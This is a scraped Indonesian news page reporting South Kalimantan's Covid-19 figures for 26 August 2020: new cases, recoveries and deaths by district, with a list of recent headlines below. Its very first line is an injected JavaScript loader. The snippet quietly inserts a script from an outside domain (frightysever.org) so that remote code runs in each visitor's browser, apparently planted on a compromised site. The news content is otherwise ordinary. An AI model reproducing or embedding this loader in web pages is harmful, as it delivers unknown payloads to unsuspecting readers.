(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: HEADLINE

153 Penderita Covid-19 di Kalsel Sembuh


KANALKALIMANTAN.COM, BANJARBARU – Jumlah kasus positif Covid-19 di Kalimantan Selatan terus merangkak. Hingga Rabu (26/8/2020) jumlah kasus Covid-19 di Kalsel secara keseluruhan nyaris menyentuh angka 8 ribu.

Gugus Tugas Percepatan Penanganan (GTPP) Covid-19 Kalsel mencatat, sudah ada 7.975 kasus positif Covid-19 di Kalsel. Dengan attack rate (AR) sebesar 185,294 per 100 ribu penduduk.

Dari jumlah tersebut, 1.916 kasus atau 24,03 persen masih menjalani perawatan. Baik di rumah sakit, pusat karantina maupun isolasi mandiri.

“Penambahan positif Covid-19 hari ini sebanyak 54 orang. Didominasi dari Kota Banjarmasin 13 orang, Kabupaten Kotabaru 12 orang dan Kota Banjarbaru 11 orang,” kata Juru Bicara GTPP Covid-19 Kalsel M. Muslim.

Infografis: kanalkalimantan/yuda

Penambahan kasus positif Covid-19 lainnya disumbang dari Kabupaten Banjar 8 orang, Kabupaten Balangan tujuh orang dan Kabupaten Tanahlaut satu orang.

Ditambahkan Kepala Dinas Kesehatan Provinsi Kalsel ini, kasus positif Covid-19 yang dinyatakan sembuh kembali melonjak, yang semuanya berasal dari pusat karantina di beberapa kabupaten dan kota di Kalsel. Saat ini, sudah ada 5.715 kasus atau 71,66 persen kasus positif Covid-19 yang telah sembuh.

“Pasien Covid-19 yang dilaporkan sembuh hari ini sebanyak 153 orang. Mayoritas dari Kota Banjarbaru 43 orang, Kota Banjarmasin 24 orang dan Kabupaten Balangan 23 orang,” imbuh Muslim.

Kasus positif Covid-19 yang sembuh juga tercatat di Kabupaten Hulu Sungai Utara 15 orang, Kabupaten Kotabaru 14 orang, Kabupaten Banjar 12 orang dan Kabupaten Hulu Sungai Tengah 11 orang. Disusul dari Kabupaten Tabalong lima orang, serta masing-masing tiga orang dari Kabupaten Barito Kuala dan Kabupaten Hulu Sungai Selatan.

Sedangkan kasus positif Covid-19 yang dilaporkan meninggal dunia kembali bertambah sebanyak dua orang. Yang masing-masing sebanyak satu orang dari Kabupaten Tanahlaut dan Kabupaten Hulu Sungai Selatan.

Saat ini, jumlah kasus kematian akibat Covid-19 sebanyak 344 kasus, dengan case fatality rate (CFR) sebesar 4,31 persen.

Sementara itu, hingga kini jumlah orang yang merupakan suspek atau diduga terpapar Covid-19 tercatat sebanyak 927 orang. (kanalkalimantan.com/fikri)

 

Reporter: Fikri
Editor: Dhani


Desy Arfianty

Recent Posts

Diberi Waktu Tiga Bulan, Peternakan Babi di Jalan Pandarapan Harus Dibongkar

KANALKALIMANTAN.COM, BANJARBARU – Sebanyak 21 kepala keluarga (KK) pemilik peternakan babi di Jalan Pandarapan RT… Read More

12 jam ago

Upacara Ritual Adat Mamapas Lewu di Desa Penda Ketapi

KANALKALIMANTAN.COM, KUALA KAPUAS - Warga Desa Penda Ketapi, Kecamatan Kapuas Barat, Kabupaten Kapuas, Kalteng, menggelar… Read More

12 jam ago

Penyuluhan Kesehatan Satgas TMMD di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Satgas TNI Manunggal Membangun Desa (TMMD) menggelar sosialisasi penyuluhan kesehatan masyarakat di… Read More

12 jam ago

Terbagi Tiga Kloter, Pj Bupati Kapuas Ingatkan Calon Haji Jaga Kondisi Kesehatan

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi melepas ratusan jemaah calon haji… Read More

13 jam ago

81 Peserta Ikuti Audisi Pemilihan Nanang dan Galuh Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Sebanyak 81 orang terdiri atas 27 laki-laki dan 54 perempuan dari beberapa… Read More

13 jam ago

Rumah di Banjarmasin Ambruk ke Sungai, Penghuni Keluar Lewat Jendela

KANALKALIMANTAN.COM, BANJARMASIN - Sebuah rumah di Jalan Sutoyo S, Gang Serumpun, Kelurahan Pelambuan, Kecamatan Banjarmasin… Read More

13 jam ago

This website uses cookies.